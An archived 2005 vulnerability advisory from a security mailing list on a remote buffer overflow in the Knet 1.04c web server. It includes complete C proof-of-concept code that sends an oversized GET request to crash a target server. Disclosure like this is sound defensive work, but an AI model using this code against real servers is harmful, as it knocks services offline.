Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Knet <= 1.04c Buffer Overflow Bug

from [CorryL] Network Security [Permanent Link]
Subject: Knet <= 1.04c Buffer Overflow Bug
Date: Fri, 25 Feb 2005 23:37:24 +0100 
-=[--------------------ADVISORY-------------------]=-
-=[                                                                         
     ]=-
-=[     Knet <= 1.04c                                                  ]=-
-=[                                                                         
     ]=-
-=[  Author: CorryL  [corryl80@gmail.com]                ]=-
-=[                                                        x0n3-h4ck.org]=-
-=[-----------------------------------------------------]=-


-=[+] Application:    Knet
-=[+] Version:        1.04c
-=[+] Vendor's URL:   www.stormystudios.com
-=[+] Platform:       Windows
-=[+] Bug type:       Buffer overflow
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL  ~ CorryL[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org


..::[ Descriprion ]::..

Knet is an small http server,easy installation and use.


..::[ Bug ]::..

This software is affected a Buffer Overflow.
A malitious attacker sending the request GET AAAAAA..... to 522,
this cause the overwrite of the eip registry,causing the execution of
malicious code.

..::[ Proof Of Concept ]::..

GET AAAAAAAAAAAAAAAAAAAAAAAAAA......... to 522 byte long

..::[ Exploit ]::..

/*

      KNet <= 1.04c is affected to a remote buffer overflow in GET command.
   This PoC demostrate the vulnerability.


      KNet <= 1.04c     PoC Denial Of Service       Coded by: Expanders

      Usage:  ./x0n3-h4ck_Knet-DoS.c <Host> <Port>


*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);


int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
 long addr;
    int sockfd, buff,rc;
 char evilbuf[1024];
 char buffer[1024];
 char *request;
 if(argc < 3 ) {
  help(argv[0]);
  exit(0);
 }
 printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
    he = gethostbyname(argv[1]);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
 request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);
 printf("\n\nConnecting to target \t...");
 rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
 if(rc==0)
 {
  printf("[Done]\nBuilding evil buffer\t...");
  memset(evilbuf,90,1023);
  printf("[Done]\nSending evil request   \t...");
  sprintf(request,"GET %s \n\r\n\r",evilbuf);
  send(sockfd,request,strlen(request),0);
  printf("[Done]\n\n[Finished] Check the server now\n");
 }
 else
  printf("[Fail] -> Unable to connect\n\n");
 close(sockfd);
 return 0;

}

void help(char *program_name) {

 printf("\n\t-=[      KNet <= 1.04b PoC Denial Of Service      ]=-\n");
 printf("\t-=[                                                    ]=-\n");
 printf("\t-=[      Coded by
ders -/www.x0n3-h4ck.org\\-      ]=-\n\n");
 printf("Usage: %s <Host> <Port>\n",program_name);
}


..::[ Workaround ]::..

Waiting for an official patch


..::[ Disclousure Timeline ]::..

[17/02/2005] - Vendor notification
[17/02/2005] - Vendor Response
[25/02/2005] - No patch relase from vendor
[25/02/2005] - Public disclousure

_________________________________
www.seekstat.it is your web stat
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Knet <= 1.04c Buffer Overflow Bug, CorryL <=
Previous by Date:  Re: [SECURITYREASON.COM] phpMyAdmin 2.6.1 Remote file inclusion, Calum Power
Next by Date:  Re: Office 10 applications & flashdrives can be used to browse restricted drives, Paul
Previous by Thread:  -==phpBB 2.0.12 Full path disclosure==-, HaCkZaTaN
Next by Thread:  Re: Office 10 applications & flashdrives can be used to browse restricted drives, Paul
Indexes:  [Date] [Thread] [Top] [All Lists]